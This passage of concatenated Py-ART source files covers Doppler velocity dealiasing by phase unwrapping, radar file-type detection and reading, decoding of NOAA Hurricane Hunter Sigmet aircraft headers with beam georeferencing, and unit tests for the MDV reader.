data = _dealias_unwrap_1d(vdata, nyquist_vel)
elif unwrap_unit == 'sweep':
data = _dealias_unwrap_2d(
radar, vdata, nyquist_vel, gfilter, rays_wrap_around)
elif unwrap_unit == 'volume':
data = _dealias_unwrap_3d(
radar, vdata, nyquist_vel, gfilter, rays_wrap_around)
else:
        message = ("Unknown `unwrap_unit` parameter, must be one of "
                   "'ray', 'sweep', or 'volume'")
raise ValueError(message)
# mask filtered gates
if np.any(gfilter):
data = np.ma.array(data, mask=gfilter)
# restore original values where dealiasing not applied
if keep_original:
data[gfilter] = raw_vdata[gfilter]
# return field dictionary containing dealiased Doppler velocities
corr_vel = get_metadata(corr_vel_field)
corr_vel['data'] = data
return corr_vel
def _dealias_unwrap_3d(radar, vdata, nyquist_vel, gfilter, rays_wrap_around):
""" Dealias using 3D phase unwrapping (full volume at once). """
# form cube and scale to phase units
nyquist_vel = nyquist_vel[0] # must be uniform, not checked
shape = (radar.nsweeps, -1, radar.ngates)
scaled_cube = (np.pi * vdata / nyquist_vel).reshape(shape)
filter_cube = gfilter.reshape(shape)
# perform unwrapping
wrapped = np.require(scaled_cube, np.float64, ['C'])
mask = np.require(filter_cube, np.uint8, ['C'])
unwrapped = np.empty_like(wrapped, dtype=np.float64, order='C')
unwrap_3d(wrapped, mask, unwrapped, [False, rays_wrap_around, False])
# scale back to velocity units
unwrapped_cube = unwrapped * nyquist_vel / np.pi
unwrapped_volume = unwrapped_cube.reshape(-1, radar.ngates)
unwrapped_volume = unwrapped_volume.astype(vdata.dtype)
return unwrapped_volume
def _dealias_unwrap_1d(vdata, nyquist_vel):
""" Dealias using 1D phase unwrapping (ray-by-ray) """
    # nyquist_vel is only available sweep by sweep, information which has
    # been lost at this point. Mentioned in the documentation.
nyquist_vel = nyquist_vel[0]
data = np.empty_like(vdata)
for i, ray in enumerate(vdata):
# extract ray and scale to phase units
scaled_ray = ray * np.pi / nyquist_vel
# perform unwrapping
wrapped = np.require(scaled_ray, np.float64, ['C'])
unwrapped = np.empty_like(wrapped, dtype=np.float64, order='C')
unwrap_1d(wrapped, unwrapped)
# scale back into velocity units and store
data[i] = unwrapped * nyquist_vel / np.pi
return data
def _dealias_unwrap_2d(radar, vdata, nyquist_vel, gfilter, rays_wrap_around):
""" Dealias using 2D phase unwrapping (sweep-by-sweep). """
data = np.zeros_like(vdata)
for nsweep, sweep_slice in enumerate(radar.iter_slice()):
# extract sweep and scale to phase units
sweep_nyquist_vel = nyquist_vel[nsweep]
scaled_sweep = vdata[sweep_slice] * np.pi / sweep_nyquist_vel
sweep_mask = gfilter[sweep_slice]
# perform unwrapping
wrapped = np.require(scaled_sweep, np.float64, ['C'])
mask = np.require(sweep_mask, np.uint8, ['C'])
unwrapped = np.empty_like(wrapped, dtype=np.float64, order='C')
unwrap_2d(wrapped, mask, unwrapped, [rays_wrap_around, False])
# scale back into velocity units and store
data[sweep_slice, :] = unwrapped * sweep_nyquist_vel / np.pi
return data
def _verify_unwrap_unit(radar, unwrap_unit):
"""
Verify that the radar supports the requested unwrap unit
raises a ValueError if the unwrap_unit is not supported.
"""
if unwrap_unit == 'sweep' or unwrap_unit == 'volume':
if _is_radar_sequential(radar) is False:
mess = ("rays are not sequentially ordered, must use 'ray' "
"unwrap_unit.")
raise ValueError(mess)
if unwrap_unit == 'volume':
if _is_radar_cubic(radar) is False:
mess = "Non-cubic radar volume, 'volume' unwrap_unit invalid. "
raise ValueError(mess)
if _is_radar_sweep_aligned(radar) is False:
mess = ("Angle in sequential sweeps in radar volumes are not "
"aligned, 'volume unwrap_unit invalid")
raise ValueError(mess)
def _is_radar_cubic(radar):
""" Test if a radar is cubic (sweeps have the same number of rays). """
rays_per_sweep = radar.rays_per_sweep['data']
return bool(np.all(rays_per_sweep == rays_per_sweep[0]))
def _is_radar_sweep_aligned(radar, diff=0.1):
"""
Test that all sweeps in the radar sample nearly the same angles.
Test that the maximum difference in sweep sampled angles is below
    `diff` degrees. The radar should first be tested to verify that it is cubic
before calling this function using the _is_radar_cubic function.
"""
if radar.nsweeps == 1:
        return True  # all single sweep volumes are sweep aligned
if radar.scan_type == 'ppi':
angles = radar.azimuth['data']
elif radar.scan_type == 'rhi':
angles = radar.elevation['data']
else:
raise ValueError('invalid scan_type: %s' % (radar.scan_type))
starts = radar.sweep_start_ray_index['data']
ends = radar.sweep_end_ray_index['data']
ref_angles = angles[starts[0]:ends[0] + 1]
for start, end in zip(starts, ends):
test_angles = angles[start:end+1]
if np.any(np.abs(test_angles - ref_angles) > diff):
return False
return True
def _is_radar_sequential(radar):
""" Test if all sweeps in radar are sequentially ordered. """
for i in range(radar.nsweeps):
if not _is_sweep_sequential(radar, i):
return False
return True
def _is_sweep_sequential(radar, sweep_number):
""" Test if a specific sweep is sequentially ordered. """
start = radar.sweep_start_ray_index['data'][sweep_number]
end = radar.sweep_end_ray_index['data'][sweep_number]
if radar.scan_type == 'ppi':
angles = radar.azimuth['data'][start:end+1]
elif radar.scan_type == 'rhi':
angles = radar.elevation['data'][start:end+1]
elif radar.scan_type == 'vpt':
# for VPT scan time should not run backwards, so time is the
# equivalent variable to an angle.
angles = radar.time['data']
else:
raise ValueError('invalid scan_type: %s' % (radar.scan_type))
rolled_angles = np.roll(angles, -np.argmin(angles))
return np.all(np.diff(rolled_angles) >= 0)
```
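For context, a minimal usage sketch of `dealias_unwrap_phase` (not part of the original file; the input file name is hypothetical, and the output field name simply matches the plotting snippet above):

```python
import pyart

# read a volume containing a 'velocity' field and dealias it sweep by sweep
radar = pyart.io.read('radar_volume_file')  # hypothetical file name
corr_vel = pyart.correct.dealias_unwrap_phase(radar, unwrap_unit='sweep')
radar.add_field('dealiased_velocity', corr_vel)
```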
#### File: pyart/io/auto_read.py
```python
import bz2
import gzip
import netCDF4
from . import _RSL_AVAILABLE
if _RSL_AVAILABLE:
from .rsl import read_rsl
from .mdv_radar import read_mdv
from .cfradial import read_cfradial
from .sigmet import read_sigmet
from .nexrad_archive import read_nexrad_archive
from .nexrad_cdm import read_nexrad_cdm
from .nexradl3_read import read_nexrad_level3
from .uf import read_uf
from .chl import read_chl
def read(filename, use_rsl=False, **kwargs):
"""
Read a radar file and return a radar object.
Additional parameters are passed to the underlying read_* function.
Parameters
----------
filename : str
        Name of radar file to read.
use_rsl : bool
True will use the TRMM RSL library to read files which are supported
both natively and by RSL. False will choose the native read function.
RSL will always be used to read a file if it is not supported
natively.
Other Parameters
    ----------------
field_names : dict, optional
Dictionary mapping file data type names to radar field names. If a
data type found in the file does not appear in this dictionary or has
a value of None it will not be placed in the radar.fields dictionary.
A value of None, the default, will use the mapping defined in the
metadata configuration file.
additional_metadata : dict of dicts, optional
Dictionary of dictionaries to retrieve metadata from during this read.
This metadata is not used during any successive file reads unless
explicitly included. A value of None, the default, will not
        introduce any additional metadata and the file specific or default
metadata as specified by the metadata configuration file will be used.
file_field_names : bool, optional
        True to use the file data type names for the field names. In this
        case the field_names parameter is ignored. The field dictionary will
likely only have a 'data' key, unless the fields are defined in
`additional_metadata`.
exclude_fields : list or None, optional
List of fields to exclude from the radar object. This is applied
after the `file_field_names` and `field_names` parameters.
delay_field_loading : bool
True to delay loading of field data from the file until the 'data'
key in a particular field dictionary is accessed. In this case
the field attribute of the returned Radar object will contain
LazyLoadDict objects not dict objects. Not all file types support this
parameter.
Returns
-------
radar : Radar
Radar object. A TypeError is raised if the format cannot be
determined.
"""
filetype = determine_filetype(filename)
# Bzip, uncompress and see if we can determine the type
if filetype == 'BZ2':
bzfile = bz2.BZ2File(filename)
try:
radar = read(bzfile, use_rsl, **kwargs)
        except Exception:
raise ValueError(
'Bzip file cannot be read compressed, '
'uncompress and try again')
finally:
bzfile.close()
return radar
# Gzip, uncompress and see if we can determine the type
if filetype == 'GZ':
gzfile = gzip.open(filename, 'rb')
try:
radar = read(gzfile, use_rsl, **kwargs)
        except Exception:
raise ValueError(
'Gzip file cannot be read compressed, '
'uncompress and try again')
finally:
gzfile.close()
return radar
# Py-ART only supported formats
if filetype == "MDV":
return read_mdv(filename, **kwargs)
if filetype == "NETCDF3" or filetype == "NETCDF4":
dset = netCDF4.Dataset(filename)
if 'cdm_data_type' in dset.ncattrs(): # NEXRAD CDM
dset.close()
return read_nexrad_cdm(filename, **kwargs)
else:
dset.close()
return read_cfradial(filename, **kwargs) # CF/Radial
if filetype == 'WSR88D':
return read_nexrad_archive(filename, **kwargs)
if filetype == 'CHL':
return read_chl(filename, **kwargs)
if filetype == 'NEXRADL3':
return read_nexrad_level3(filename, **kwargs)
# RSL supported formats which are also supported natively in Py-ART
if filetype == "SIGMET":
if use_rsl:
return read_rsl(filename, **kwargs)
else:
return read_sigmet(filename, **kwargs)
if filetype == "UF":
if use_rsl:
return read_rsl(filename, **kwargs)
else:
return read_uf(filename, **kwargs)
# RSL only supported file formats
    rsl_formats = ['HDF4', 'RSL', 'DORADE', 'LASSEN']
if filetype in rsl_formats and _RSL_AVAILABLE:
return read_rsl(filename, **kwargs)
raise TypeError('Unknown or unsupported file format: ' + filetype)
def determine_filetype(filename):
"""
Return the filetype of a given file by examining the first few bytes.
The following filetypes are detected:
* 'MDV'
* 'NETCDF3'
* 'NETCDF4'
* 'WSR88D'
* 'NEXRADL3'
* 'UF'
* 'HDF4'
* 'RSL'
    * 'DORADE'
    * 'CHL'
* 'SIGMET'
* 'LASSEN'
* 'BZ2'
* 'GZ'
* 'UNKNOWN'
Parameters
----------
filename : str
Name of file to examine.
Returns
-------
filetype : str
Type of file.
"""
# TODO
# detect the following formats, those supported by RSL
# 'RADTEC', the SPANDAR radar at Wallops Island, VA
# 'MCGILL', McGill S-band
# 'TOGA', DYNAMO project's radar
# 'RAPIC', Berrimah Australia
# 'RAINBOW'
# read the first 12 bytes from the file
try:
f = open(filename, 'rb')
begin = f.read(12)
f.close()
except TypeError:
f = filename
begin = f.read(12)
f.seek(-12, 1)
# MDV, read with read_mdv
# MDV format signature from MDV FORMAT Interface Control Document (ICD)
    # record_len1, struct_id, revision_number
# 1016, 14142, 1
# import struct
# mdv_signature = struct.pack('>3i', 1016, 14142, 1)
mdv_signature = b'\x00\x00\x03\xf8\x00\x007>\x00\x00\x00\x01'
if begin[:12] == mdv_signature:
return "MDV"
# CSU-CHILL
# begins with ARCH_ID_FILE_HDR = 0x5aa80004
# import struct
# struct.pack('<i', 0x5aa80004)
chl_signature = b'\x04\x00\xa8Z'
if begin[:4] == chl_signature:
return "CHL"
# NetCDF3, read with read_cfradial
if begin[:3] == b"CDF":
return "NETCDF3"
# NetCDF4, read with read_cfradial, contained in a HDF5 container
# HDF5 format signature from HDF5 specification documentation
hdf5_signature = b'\x89\x48\x44\x46\x0d\x0a\x1a\x0a'
if begin[:8] == hdf5_signature:
return "NETCDF4"
    # NEXRAD LEVEL 3 files begin with SDUSXX KXXX
    nexrad_l3_signature = b'SDUS'
    if begin[:4] == nexrad_l3_signature:
return "NEXRADL3"
# Other files should be read with read_rsl
# WSR-88D begin with ARCHIVE2. or AR2V000
if begin[:9] == b'ARCHIVE2.' or begin[:7] == b'AR2V000':
return "WSR88D"
# Universal format has UF in bytes 0,1 or 2,3 or 4,5
if begin[:2] == b"UF" or begin[2:4] == b"UF" or begin[4:6] == b"UF":
return "UF"
# DORADE files
if begin[:4] == b"SSWB" or begin[:4] == b"VOLD" or begin[:4] == b"COMM":
return "DORADE"
# LASSEN
if begin[4:11] == b'SUNRISE':
return "LASSEN"
# RSL file
if begin[:3] == b"RSL":
return "RSL"
# HDF4 file
# HDF4 format signature from HDF4 specification documentation
hdf4_signature = b'\x0e\x03\x13\x01'
if begin[:4] == hdf4_signature:
return "HDF4"
# SIGMET files
# SIGMET format is a structure_header with a Product configuration
# indicator (see section 4.2.47)
# sigmet_signature = chr(27)
sigmet_signature = b'\x1b'
if begin[0:1] == sigmet_signature:
return "SIGMET"
# bzip2 compressed files
bzip2_signature = b'BZh'
if begin[:3] == bzip2_signature:
return 'BZ2'
gzip_signature = b'\x1f\x8b'
if begin[:2] == gzip_signature:
return 'GZ'
# Cannot determine filetype
return "UNKNOWN"
```
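A short sketch of how `determine_filetype` and `read` fit together (added for illustration; the file path is hypothetical):

```python
import pyart
from pyart.io.auto_read import determine_filetype

filename = 'radar_data_file'  # hypothetical path to any supported format
print(determine_filetype(filename))  # e.g. 'WSR88D' for a NEXRAD archive file
radar = pyart.io.read(filename)      # dispatches to the matching read_* function
```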
#### File: pyart/io/_sigmet_noaa_hh.py
```python
import numpy as np
from ._sigmetfile import bin4_to_angle, bin2_to_angle
def _decode_noaa_hh_hdr(
raw_extended_headers, filemetadata, azimuth, elevation,
position_source='irs', heading_source='irs'):
"""
Extract data from Sigmet extended headers produced by NOAA
Hurricane Hunter airborne radars.
Parameters
----------
raw_extended_headers : ndarray
Raw Sigmet extended headers.
filemetadata : FileMetadata
FileMetadata class from which metadata will be derived.
azimuth : dict
Dictionary of azimuth angles recorded in Sigmet file.
elevation : dict
Dictionary of elevation angles recorded in Sigmet file.
position_source: {'irs', 'gps', 'aamps'}, optional
Instrument from which to derive position parameters.
heading_source: {'irs', 'aamps'}
Instrument from which to derive heading parameters.
Returns
-------
latitude : dict
Dictionary containing latitude data and metadata.
longitude : dict
Dictionary containing longitude data and metadata.
altitude : dict
Dictionary containing altitude data and metadata.
heading_params : dict
Dictionary of dictionary containing aircraft heading data and
        metadata. Contains 'heading', 'roll', 'pitch', 'drift', 'rotation',
'tilt' and 'georefs_applied' dictionaries.
"""
xhdr = np.rec.fromstring(raw_extended_headers[..., :68].tostring(),
dtype=list(NOAA_HH_EXTENDED_HEADER))
# rotation and tilt from azimuth/elevation angles
rotation = filemetadata('rotation')
tilt = filemetadata('tilt')
rotation_data = 90. - elevation['data'].copy()
rotation_data[rotation_data < 0] += 360.
rotation['data'] = rotation_data
tilt_data = azimuth['data'].copy()
tilt_data[tilt_data > 180] -= 360.
tilt['data'] = tilt_data
# airborne parameters
heading = filemetadata('heading')
roll = filemetadata('roll')
pitch = filemetadata('pitch')
drift = filemetadata('drift')
if heading_source == 'irs':
heading_data = bin2_to_angle(xhdr['irs_heading'])
roll_data = bin2_to_angle(xhdr['irs_roll'])
pitch_data = bin2_to_angle(xhdr['irs_pitch'])
drift_data = bin2_to_angle(xhdr['irs_drift'])
elif heading_source == 'aamps':
heading_data = bin2_to_angle(xhdr['aamps_heading'])
roll_data = bin2_to_angle(xhdr['aamps_roll'])
pitch_data = bin2_to_angle(xhdr['aamps_pitch'])
drift_data = bin2_to_angle(xhdr['aamps_drift'])
else:
raise ValueError('Unknown heading_source')
heading['data'] = heading_data
roll['data'] = roll_data
pitch['data'] = pitch_data
drift['data'] = drift_data
# georeferenced azimuth and elevation
az, elev = _georeference_yprime(
roll_data, pitch_data, heading_data, drift_data, rotation_data,
tilt_data)
azimuth['data'] = az
elevation['data'] = elev
georefs_applied = filemetadata('georefs_applied')
georefs_applied['data'] = np.ones(az.shape, dtype='int8')
# positions: latitude, longitude, altitude
latitude = filemetadata('latitude')
longitude = filemetadata('longitude')
altitude = filemetadata('altitude')
if position_source == 'gps':
lat_data = bin4_to_angle(xhdr['gps_lat'])
lon_data = bin4_to_angle(xhdr['gps_long'])
alt_data = xhdr['gps_alt'] / 100.
elif position_source == 'aamps':
lat_data = bin4_to_angle(xhdr['aamps_lat'])
lon_data = bin4_to_angle(xhdr['aamps_long'])
alt_data = xhdr['aamps_alt'] / 100.
elif position_source == 'irs':
lat_data = bin4_to_angle(xhdr['irs_lat'])
lon_data = bin4_to_angle(xhdr['irs_long'])
        # the extended header has no IRS altitude field; GPS altitude is used
        alt_data = xhdr['gps_alt'] / 100.
else:
raise ValueError('Invalid position_source')
latitude['data'] = lat_data
longitude['data'] = lon_data
altitude['data'] = alt_data
extended_header_params = {
'heading': heading,
'roll': roll,
'pitch': pitch,
'drift': drift,
'rotation': rotation,
'tilt': tilt,
'georefs_applied': georefs_applied}
return (latitude, longitude, altitude, extended_header_params)
def _georeference_yprime(roll, pitch, heading, drift, rotation, tilt):
"""
Compute georeferenced azimuth and elevation angles for a Y-prime radar.
This is the georeferencing needed for the tail doppler radar on the
NOAA P3 aircraft.
"""
# Adapted from Radx's SigmetRadxFile::_computeAzEl method found in
# SigmetRadxFile.cc
# Transforms defined in Wen-Chau Lee et al, JTech, 1994, 11, 572-578.
# Convert to radians and use variable names from Wen-Chau Lee paper
R = np.radians(roll) # roll
P = np.radians(pitch) # pitch
H = np.radians(heading) # heading
D = np.radians(drift) # drift
T = H + D # track
theta_a = np.radians(rotation)
tau_a = np.radians(tilt)
# Eq. (9)
x_t = (np.cos(theta_a + R) * np.sin(D) * np.cos(tau_a) * np.sin(P) +
np.cos(D) * np.sin(theta_a + R) * np.cos(tau_a) -
np.sin(D) * np.cos(P) * np.sin(tau_a))
y_t = (-np.cos(theta_a + R) * np.cos(D) * np.cos(tau_a) * np.sin(P) +
np.sin(D) * np.sin(theta_a + R) * np.cos(tau_a) +
np.cos(P) * np.cos(D) * np.sin(tau_a))
z_t = (np.cos(P) * np.cos(tau_a) * np.cos(theta_a + R) +
np.sin(P) * np.sin(tau_a))
# Eq. (12) and discussion after Eq. (17)
lambda_t = np.arctan2(x_t, y_t)
azimuth = np.fmod(lambda_t + T, 2 * np.pi)
# Eq (17)
elevation = np.arcsin(z_t)
# convert to degrees and fix range
azimuth = np.degrees(azimuth)
azimuth[azimuth < 0] += 360.
elevation = np.degrees(elevation)
elevation[elevation > 180] -= 360.
return azimuth, elevation
# NOAA Hurricane Hunter Sigmet extended header structure
# scalar definitions
UINT16 = 'H'
INT16 = 'h'
BAM16 = 'h'
INT32 = 'i'
BAM32 = 'i'
NOAA_HH_EXTENDED_HEADER = (
('msecs_since_sweep_start', INT32),
('calib_signal_level', INT16),
('nbytes_in_header', INT16),
('__pad_1', UINT16),
('gps_age', UINT16), # Time in milliseconds since last GPS Input
('irs_age', UINT16), # Time in milliseconds since last IRS Input
('aamps_age', UINT16), # Time in milliseconds since last
# AAMPS Input
('gps_lat', BAM32), # GPS latitude (BAM)
('gps_long', BAM32), # GPS Longitude (BAM)
('gps_alt', INT32), # GPS Altitude (cm)
('gps_vel_e', INT32), # GPS Ground Speed East (cm/second)
('gps_vel_n', INT32), # GPS Ground Speed North (cm/second)
('gps_vel_v', INT32), # GPS Ground Speed Up (cm/second)
('irs_lat', BAM32), # IRS latitude (BAM)
('irs_long', BAM32), # IRS Longitude (BAM)
('irs_vel_e', INT32), # IRS Ground Speed East (cm/second)
('irs_vel_n', INT32), # IRS Ground Speed North (cm/second)
('irs_vel_v', INT32), # IRS Ground Speed Up (cm/second)
('irs_pitch', BAM16), # IRS Pitch (BAM)
('irs_roll', BAM16), # IRS Roll (BAM)
('irs_heading', BAM16), # IRS Heading (BAM)
('irs_drift', BAM16), # IRS Drift (BAM)
('irs_tru_track', BAM16), # IRS True Track (BAM)
('irs_pitch_r', BAM16), # IRS Pitch rate (BAM/sec)
('irs_roll_r', BAM16), # IRS Roll rate (BAM/sec)
('irs_yaw_r', BAM16), # IRS Yaw rate (BAM/sec)
('irs_wind_vel', INT32), # IRS Wind speed (cm/second)
('irs_wind_dir', BAM16), # IRS Wind direction (BAM)
('__pad_2', UINT16),
('aamps_lat', BAM32), # AAMPS latitude (BAM)
('aamps_long', BAM32), # AAMPS Longitude (BAM)
('aamps_alt', INT32), # AAMPS Altitude (cm)
('aamps_ground_vel', INT32), # AAMPS Ground Speed East (cm/second)
('aamps_time_stamp', INT32), # AAMPS Timestamp in UTC
# (seconds since the epoch)
('aamps_vel_v', INT32), # AAMPS Vertical Velocity (cm/second)
('aamps_pitch', BAM16), # AAMPS Pitch (BAM)
('aamps_roll', BAM16), # AAMPS Roll (BAM)
('aamps_heading', BAM16), # AAMPS Heading (BAM)
('aamps_drift', BAM16), # AAMPS Drift (BAM)
('aamps_track', BAM16), # AAMPS Track (BAM)
('__pad_4', UINT16),
('aamps_radalt_val', INT32), # AAMPS Radar Altitude (cm)
('aamps_wind_vel', INT32), # AAMPS Wind Speed (cm/second)
('aamps_wind_dir', BAM16), # AAMPS Wind direction (BAM)
('__pad_5', UINT16),
('aamps_wind_vel_v', INT32), # AAMPS Wind Speed Up (cm/second)
)
```
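A quick numerical check of `_georeference_yprime` (an added sketch; the import path simply mirrors this file's location): with zero roll, pitch, drift and tilt, Eq. (9) reduces to x_t = sin(theta_a), y_t = 0 and z_t = cos(theta_a), so the beam azimuth is the heading plus 90 degrees and the elevation is 90 degrees minus the rotation angle.

```python
import numpy as np
from pyart.io._sigmet_noaa_hh import _georeference_yprime

rotation = np.array([45., 90., 135.])  # degrees from straight up
zeros = np.zeros_like(rotation)        # level flight, zero tilt
heading = np.full_like(rotation, 30.)
az, elev = _georeference_yprime(zeros, zeros, heading, zeros, rotation, zeros)
print(az)    # [120. 120. 120.]
print(elev)  # [ 45.   0. -45.]
```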
#### File: io/tests/test_mdv_radar.py
```python
import numpy as np
from numpy.testing import assert_almost_equal
from numpy.ma.core import MaskedArray
import pyart
############################################
# read_mdv tests (verify radar attributes) #
############################################
# read in the sample file and create a Radar object
radar = pyart.io.read_mdv(pyart.testing.MDV_PPI_FILE)
# time attribute
def test_time():
assert 'comment' in radar.time.keys()
assert 'long_name' in radar.time.keys()
assert 'standard_name' in radar.time.keys()
assert 'units' in radar.time.keys()
assert 'calendar' in radar.time.keys()
assert 'data' in radar.time.keys()
assert radar.time['units'] == 'seconds since 2011-05-20T11:01:00Z'
assert radar.time['data'].shape == (360, )
assert_almost_equal(radar.time['data'][200], 187, 0)
# range attribute
def test_range():
assert 'long_name' in radar.range
assert 'standard_name' in radar.range
assert 'meters_to_center_of_first_gate' in radar.range
assert 'meters_between_gates' in radar.range
assert 'units' in radar.range
assert 'data' in radar.range
assert 'spacing_is_constant' in radar.range
assert radar.range['data'].shape == (110, )
assert_almost_equal(radar.range['data'][0], 118, 0)
# fields attribute is tested later
# metadata attribute
def test_metadata():
assert 'instrument_name' in radar.metadata
assert 'source' in radar.metadata
# scan_type attribute
def test_scan_type():
assert radar.scan_type == 'ppi'
# latitude attribute
def test_latitude():
assert 'data' in radar.latitude
assert 'standard_name' in radar.latitude
assert 'units' in radar.latitude
assert radar.latitude['data'].shape == (1, )
assert_almost_equal(radar.latitude['data'], 37, 0)
# longitude attribute
def test_longitude():
assert 'data' in radar.longitude
assert 'standard_name' in radar.longitude
assert 'units' in radar.longitude
assert radar.longitude['data'].shape == (1, )
assert_almost_equal(radar.longitude['data'], -97, 0)
# altitude attribute
def test_altitude():
assert 'data' in radar.altitude
assert 'standard_name' in radar.altitude
assert 'units' in radar.altitude
assert 'positive' in radar.altitude
assert radar.altitude['data'].shape == (1, )
assert_almost_equal(radar.altitude['data'], 328, 0)
# altitude_agl attribute
def test_altitude_agl():
assert radar.altitude_agl is None
# sweep_number attribute
def test_sweep_number():
assert 'standard_name' in radar.sweep_number
assert np.all(radar.sweep_number['data'] == range(1))
# sweep_mode attribute
def test_sweep_mode():
assert 'standard_name' in radar.sweep_mode
assert radar.sweep_mode['data'].shape == (1, )
assert radar.sweep_mode['data'].dtype.char == 'S'
assert np.all(radar.sweep_mode['data'] == [b'azimuth_surveillance'])
# fixed_angle attribute
def test_fixed_angle():
assert 'standard_name' in radar.fixed_angle
assert 'units' in radar.fixed_angle
assert radar.fixed_angle['data'].shape == (1, )
assert_almost_equal(radar.fixed_angle['data'][0], 0.75, 2)
# sweep_start_ray_index attribute
def test_sweep_start_ray_index():
assert 'long_name' in radar.sweep_start_ray_index
assert radar.sweep_start_ray_index['data'].shape == (1, )
assert_almost_equal(radar.sweep_start_ray_index['data'][0], 0, 0)
# sweep_end_ray_index attribute
def test_sweep_end_ray_index():
assert 'long_name' in radar.sweep_end_ray_index
assert radar.sweep_end_ray_index['data'].shape == (1, )
assert_almost_equal(radar.sweep_end_ray_index['data'][0], 359, 0)
# target_scan_rate attribute
def test_target_scan_rate():
assert radar.target_scan_rate is None
# azimuth attribute
def test_azimuth():
assert 'standard_name' in radar.azimuth
assert 'long_name' in radar.azimuth
assert 'units' in radar.azimuth
assert 'axis' in radar.azimuth
assert_almost_equal(radar.azimuth['data'][0], 0, 0)
assert_almost_equal(radar.azimuth['data'][10], 10.0, 0)
# elevation attribute
def test_elevation():
assert 'standard_name' in radar.elevation
assert 'long_name' in radar.azimuth
assert 'units' in radar.elevation
assert 'axis' in radar.elevation
assert radar.elevation['data'].shape == (360, )
assert_almost_equal(radar.elevation['data'][0], 0.75, 2)
# scan_rate attribute
def test_scan_rate():
assert radar.scan_rate is None
# antenna_transition attribute
def test_antenna_transition():
assert radar.antenna_transition is None
# instrument_parameters attribute
def test_instrument_parameters():
# instrument_parameter sub-convention
keys = ['prt', 'unambiguous_range', 'prt_mode', 'nyquist_velocity']
for k in keys:
description = 'instrument_parameters: %s' % k
check_instrument_parameter.description = description
yield check_instrument_parameter, k
def check_instrument_parameter(param):
assert param in radar.instrument_parameters
param_dic = radar.instrument_parameters[param]
assert param_dic['meta_group'] == 'instrument_parameters'
# radar_parameters attribute
def test_radar_parameters():
# radar_parameter sub-convention
keys = ['radar_beam_width_h', 'radar_beam_width_v']
for k in keys:
description = 'radar_parameters: %s' % k
check_radar_parameter.description = description
yield check_radar_parameter, k
def check_radar_parameter(param):
assert param in radar.instrument_parameters
param_dic = radar.instrument_parameters[param]
assert param_dic['meta_group'] == 'radar_parameters'
# radar_calibration attribute
def test_radar_calibration():
assert radar.radar_calibration is None
# ngates attribute
def test_ngates():
assert radar.ngates == 110
# nrays attribute
def test_nrays():
assert radar.nrays == 360
# nsweeps attribute
def test_nsweeps():
assert radar.nsweeps == 1
####################
# fields attribute #
####################
def test_field_dics():
fields = ['reflectivity', ]
for field in fields:
description = "field : %s, dictionary" % field
check_field_dic.description = description
yield check_field_dic, field
def check_field_dic(field):
""" Check that the required keys are present in a field dictionary. """
assert 'standard_name' in radar.fields[field]
assert 'units' in radar.fields[field]
assert '_FillValue' in radar.fields[field]
assert 'coordinates' in radar.fields[field]
def test_field_shapes():
fields = ['reflectivity', ]
for field in fields:
description = "field : %s, shape" % field
check_field_shape.description = description
yield check_field_shape, field
def check_field_shape(field):
assert radar.fields[field]['data'].shape == (360, 110)
def test_field_types():
fields = {'reflectivity': MaskedArray, }
for field, field_type in fields.items():
description = "field : %s, type" % field
check_field_type.description = description
yield check_field_type, field, field_type
def check_field_type(field, field_type):
assert type(radar.fields[field]['data']) is field_type
def test_field_first_points():
# these values can be found using:
# [round(radar.fields[f]['data'][0,0]) for f in radar.fields]
fields = {'reflectivity': 24.0}
for field, field_value in fields.items():
description = "field : %s, first point" % field
check_field_first_point.description = description
yield check_field_first_point, field, field_value
def check_field_first_point(field, value):
assert_almost_equal(radar.fields[field]['data'][0, 0], value, 0)
#############
# RHI tests #
#############
RADAR_RHI = pyart.io.read_mdv(pyart.testing.MDV_RHI_FILE,
delay_field_loading=True)
# nsweeps attribute
def test_rhi_nsweeps():
assert RADAR_RHI.nsweeps == 1
# sweep_number attribute
def test_rhi_sweep_number():
assert 'standard_name' in RADAR_RHI.sweep_number
assert np.all(RADAR_RHI.sweep_number['data'] == range(1))
# sweep_mode attribute
def test_rhi_sweep_mode():
assert 'standard_name' in RADAR_RHI.sweep_mode
assert RADAR_RHI.sweep_mode['data'].shape == (1, )
assert np.all(RADAR_RHI.sweep_mode['data'] == [b'rhi'])
# fixed_angle attribute
def test_rhi_fixed_angle():
assert 'standard_name' in RADAR_RHI.fixed_angle
assert 'units' in RADAR_RHI.fixed_angle
assert RADAR_RHI.fixed_angle['data'].shape == (1, )
assert_almost_equal(RADAR_RHI.fixed_angle['data'][0], 189.00, 2)
# sweep_start_ray_index attribute
def test_rhi_sweep_start_ray_index():
assert 'long_name' in RADAR_RHI.sweep_start_ray_index
assert RADAR_RHI.sweep_start_ray_index['data'].shape == (1, )
assert_almost_equal(RADAR_RHI.sweep_start_ray_index['data'][0], 0, 0)
# sweep_end_ray_index attribute
def test_rhi_sweep_end_ray_index():
assert 'long_name' in RADAR_RHI.sweep_end_ray_index
assert RADAR_RHI.sweep_end_ray_index['data'].shape == (1, )
assert_almost_equal(RADAR_RHI.sweep_end_ray_index['data'][0], 282, 0)
# azimuth attribute
def test_rhi_azimuth():
assert 'standard_name' in RADAR_RHI.azimuth
assert 'long_name' in RADAR_RHI.azimuth
assert 'units' in RADAR_RHI.azimuth
assert 'axis' in RADAR_RHI.azimuth
assert_almost_equal(RADAR_RHI.azimuth['data'][0], 189, 0)
assert_almost_equal(RADAR_RHI.azimuth['data'][10], 189, 0)
# elevation attribute
def test_rhi_elevation():
assert 'standard_name' in RADAR_RHI.elevation
assert 'long_name' in RADAR_RHI.azimuth
assert 'units' in RADAR_RHI.elevation
assert 'axis' in RADAR_RHI.elevation
assert RADAR_RHI.elevation['data'].shape == (283, )
assert_almost_equal(RADAR_RHI.elevation['data'][0], 19.6, 2)
# field data
def test_rhi_field_data():
assert_almost_equal(RADAR_RHI.fields['reflectivity']['data'][0, 0],
23.93, 2)
def test_open_from_file_obj():
fh = open(pyart.testing.MDV_PPI_FILE, 'rb')
    radar = pyart.io.read_mdv(fh)
fh.close()
def test_radar_exclude_fields():
# skip fields
radar = pyart.io.read_mdv(
pyart.testing.MDV_PPI_FILE, exclude_fields=['reflectivity'])
assert 'reflectivity' not in radar.fields
```
#### File: retrieve/tests/test_gate_id.py
```python
import numpy as np
import netCDF4
import pyart
def test_map_profile_to_gates():
test_radar = pyart.testing.make_empty_ppi_radar(100, 360, 5)
foo_field = {'data': np.zeros([360 * 5, 100])}
test_radar.add_field('foo', foo_field)
z_dict, temp_dict = pyart.retrieve.map_profile_to_gates(
np.ones(100), np.linspace(0, 1000, 100), test_radar)
assert temp_dict['data'].mean() == 1.0
